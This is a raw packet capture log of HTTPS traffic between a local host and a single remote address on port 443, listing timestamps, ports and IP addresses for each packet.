Dec 12, 2024 22:40:25.652077913 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.652113914 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.652359009 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.652383089 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.653337955 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.653351068 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.653405905 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.697866917 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.697999954 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.700390100 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.700423002 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.880939960 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.896756887 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.896812916 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.896842003 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.896862984 CET	49741	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.896879911 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.896914005 CET	49741	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.896919966 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.902934074 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.903009892 CET	49741	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.932251930 CET	49741	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.932266951 CET	443	49741	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.932276964 CET	49741	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.932344913 CET	49741	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.932715893 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.932749987 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:25.932957888 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.933835030 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:25.933847904 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.101448059 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.102057934 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.103666067 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.107326031 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.107346058 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.107526064 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.107536077 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.107536077 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.107556105 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.108570099 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.108659029 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.108711958 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.108927011 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.109750032 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.109858990 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.146181107 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.146325111 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.146456957 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.146591902 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.146781921 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.146858931 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.147862911 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.147881031 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.148072958 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.148091078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.148186922 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.148205042 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.355370045 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.355448008 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.359334946 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.359335899 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.359399080 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.359399080 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.557740927 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.557804108 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.557842016 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.557859898 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.557888031 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.557929993 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.557972908 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.557980061 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.558017969 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.572689056 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.576888084 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.576951981 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.576961994 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.578577042 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.578633070 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.578664064 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.578699112 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.578711987 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.578783035 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.578821898 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.586874008 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.586930037 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.586962938 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.593209982 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.593287945 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.593348026 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.600616932 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.600684881 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.677746058 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.677786112 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.677942991 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.677980900 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.678025961 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.678034067 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.678591013 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.744329929 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.752721071 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.757309914 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.757342100 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.767646074 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.769313097 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.769325018 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.783643007 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.784322977 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.784349918 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.799086094 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.799343109 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.799362898 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.814717054 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.814802885 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.814821959 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.871329069 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.871366024 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.938564062 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.938606977 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.938779116 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:26.938852072 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:26.940335035 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.045238018 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.054655075 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.058454037 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.058573008 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.058689117 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.078310013 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.078485966 CET	443	49746	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.078564882 CET	49746	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.120567083 CET	49747	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.120600939 CET	443	49747	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.123193979 CET	49744	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.123270988 CET	443	49744	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165410995 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165457964 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165488005 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165508032 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165512085 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165533066 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165585041 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165585041 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165596008 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165611029 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165671110 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165672064 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165685892 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165719986 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165752888 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165800095 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165805101 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165817976 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.165863037 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.165877104 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166558981 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166606903 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166630983 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.166634083 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166645050 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166683912 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.166688919 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166699886 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.166738033 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167220116 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167392969 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167402029 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167454958 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167474985 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167479992 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167494059 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167496920 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167530060 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167542934 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167546988 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167561054 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167598963 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167606115 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167615891 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167709112 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.167804956 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.167823076 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168433905 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168452978 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168463945 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168519974 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168521881 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.168536901 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168581009 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168592930 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.168602943 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168728113 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.168910980 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168932915 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168956041 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168978930 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.168982983 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.169004917 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.169061899 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.169061899 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.169080973 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.169105053 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.169168949 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.169641972 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.223762989 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.223829031 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.223860025 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.258054018 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.273216009 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.273251057 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.286786079 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.286967039 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.287131071 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.287148952 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.287980080 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.288021088 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.288052082 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.288135052 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.288299084 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.291246891 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.291300058 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.291330099 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.293174982 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.298419952 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.298490047 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.298518896 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.303556919 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.303639889 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.303649902 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.306909084 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.306956053 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.306965113 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.307751894 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.307918072 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.307933092 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.310755014 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.310782909 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.310817957 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.310827971 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.310863018 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.313815117 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.316212893 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.316288948 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.316304922 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.317209005 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.317286015 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.317312002 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.320864916 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.320935011 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.320944071 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.324451923 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.324577093 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.324599028 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.324604034 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.324662924 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.324743986 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.324759007 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.325011969 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.327636957 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.327688932 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.327713013 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.331003904 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.331048965 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.333297014 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.342272997 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.342331886 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.342360973 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.351869106 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.352062941 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.352083921 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.358469009 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.358571053 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.358594894 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.375200987 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.375284910 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.375303030 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.376295090 CET	49742	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.376334906 CET	443	49742	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.389477015 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.389538050 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.389688015 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.407582045 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.407711983 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.407733917 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.411024094 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.411295891 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.411331892 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.419270992 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.419353008 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.419368029 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.436120987 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.436182976 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.436199903 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.436218023 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.436346054 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.438723087 CET	49757	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.438754082 CET	443	49757	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.444720984 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.453185081 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.453238964 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.453272104 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.453289986 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.453414917 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.461642027 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.470216990 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.470768929 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.470796108 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.478439093 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.478518009 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.478547096 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.486768007 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.486881971 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.486898899 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.503483057 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.503664017 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.503685951 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.511970997 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.512034893 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.512120962 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.512140989 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.512373924 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.520445108 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.528867960 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.529023886 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.529050112 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.532326937 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.532377958 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.532397985 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.535890102 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.535984039 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.535994053 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.539550066 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.539657116 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.539680004 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.546416998 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.546459913 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.546591997 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.546610117 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.546822071 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.549833059 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.553260088 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.553313971 CET	443	49745	142.250.181.132	192.168.2.5
